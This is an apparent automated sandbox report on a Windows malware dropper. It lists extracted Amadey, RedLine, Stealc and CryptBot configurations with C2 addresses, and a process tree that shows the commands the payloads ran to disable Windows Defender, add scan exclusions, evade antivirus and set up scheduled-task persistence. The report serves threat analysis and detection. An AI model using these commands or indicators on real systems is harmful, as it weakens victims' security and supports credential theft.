Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    293s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe

  • Size

    1.8MB

  • MD5

    9731fffd7b478b386655c8b87eed24ac

  • SHA1

    92ad41f7bd9879774dc4e52e1781ccd8b328320e

  • SHA256

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e

  • SHA512

    1e7558535668bf98d6bb5dd34dc37778387d56572005a4179e78719f108ea468f88ec10143281b6b2d4291f7c370bedded6cd3ae4b3303c0b88d9739314f3bbb

  • SSDEEP

    49152:7LMeoAgVVqdZIOdOq1bch/o/VoI2mEPUDjjx7yZX:7YrAgVVq5zEHXPUD35yN

Score
10/10
amadeycryptbotredlinestealc@oleh_pspbundledefaultdefault2fed3aalivetraffictg cloud @rlreborn admin @fatherofcarderscredential_accessdefense_evasiondiscoveryevasionexecutioninfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top
Attributes
  • url_path

    /v1/upload.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
    evasiontrojan
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 7 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 40 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 36 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1288
      • C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
        "C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2136
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2904
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2928
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:856
            • C:\Users\Admin\AppData\Roaming\018rEwaviU.exe
              "C:\Users\Admin\AppData\Roaming\018rEwaviU.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2264
            • C:\Users\Admin\AppData\Roaming\7ghyGf0Gwe.exe
              "C:\Users\Admin\AppData\Roaming\7ghyGf0Gwe.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1736
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1400
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:1580
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:3360
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4024
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:740
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3040
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2536
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2064
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2060
            • C:\Users\Admin\AppData\Local\Temp\filename.exe
              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1144
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                6⤵
                  PID:3436
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "filename.exe" /f
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3584
            • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
              "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              PID:1280
            • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2932
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:2956
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1556
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2928
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa opssvc"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2604
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1576
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2996
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 607698
                  6⤵
                    PID:2312
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "MaskBathroomCompositionInjection" Participants
                    6⤵
                      PID:856
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                      6⤵
                        PID:1984
                      • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                        Waters.pif Q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:1896
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1016
                  • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:2356
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1092
                  • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:828
                    • C:\Users\Admin\AppData\Local\Temp\7zS37F2.tmp\Install.exe
                      .\Install.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1620
                      • C:\Users\Admin\AppData\Local\Temp\7zS39C6.tmp\Install.exe
                        .\Install.exe /RNXdidDHt "385121" /S
                        6⤵
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates system info in registry
                        PID:1396
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:1340
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            8⤵
                            • Indirect Command Execution
                            PID:1992
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              9⤵
                                PID:2604
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2068
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                              8⤵
                              • Indirect Command Execution
                              PID:1892
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:2092
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  10⤵
                                    PID:2996
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:2312
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  9⤵
                                    PID:856
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      10⤵
                                        PID:1696
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:1260
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2656
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        10⤵
                                          PID:2300
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      8⤵
                                      • Indirect Command Execution
                                      PID:1156
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        9⤵
                                          PID:3048
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            10⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2096
                                            • C:\Windows\SysWOW64\gpupdate.exe
                                              "C:\Windows\system32\gpupdate.exe" /force
                                              11⤵
                                                PID:2700
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                        7⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:2820
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1644
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2544
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              10⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:292
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\FPqDmOv.exe\" PV /BodHdidekNb 385121 /S" /V1 /F
                                        7⤵
                                        • Drops file in Windows directory
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:992
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 632
                                        7⤵
                                        • Loads dropped DLL
                                        • Program crash
                                        PID:3304
                                • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                  4⤵
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1976
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3124
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3404
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3688
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3728
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                    5⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3224
                                  • C:\Users\Admin\AppData\Local\Temp\ofbhnp.exe
                                    "C:\Users\Admin\AppData\Local\Temp\ofbhnp.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2708
                                  • C:\Users\Admin\AppData\Local\Temp\obgobr.exe
                                    "C:\Users\Admin\AppData\Local\Temp\obgobr.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:3068
                                  • C:\Users\Admin\AppData\Local\Temp\uautoc.exe
                                    "C:\Users\Admin\AppData\Local\Temp\uautoc.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:3748
                                • C:\Users\Admin\AppData\Local\Temp\1000308001\18c955fd38.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000308001\18c955fd38.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Blocklisted process makes network request
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:796
                                • C:\Users\Admin\AppData\Local\Temp\1000309001\15adef7350.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000309001\15adef7350.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:2296
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                    5⤵
                                      PID:2420
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                        6⤵
                                        • Checks processor information in registry
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:1736
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.0.1402161350\1879451812" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {24288394-7ac2-4889-a69f-0f8ebf25e739} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 1316 105d9e58 gpu
                                          7⤵
                                            PID:2104
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.1.2047304733\2069826304" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18c9b402-a6ac-4026-9ac5-55878edac087} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 1528 f2ee858 socket
                                            7⤵
                                              PID:1640
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
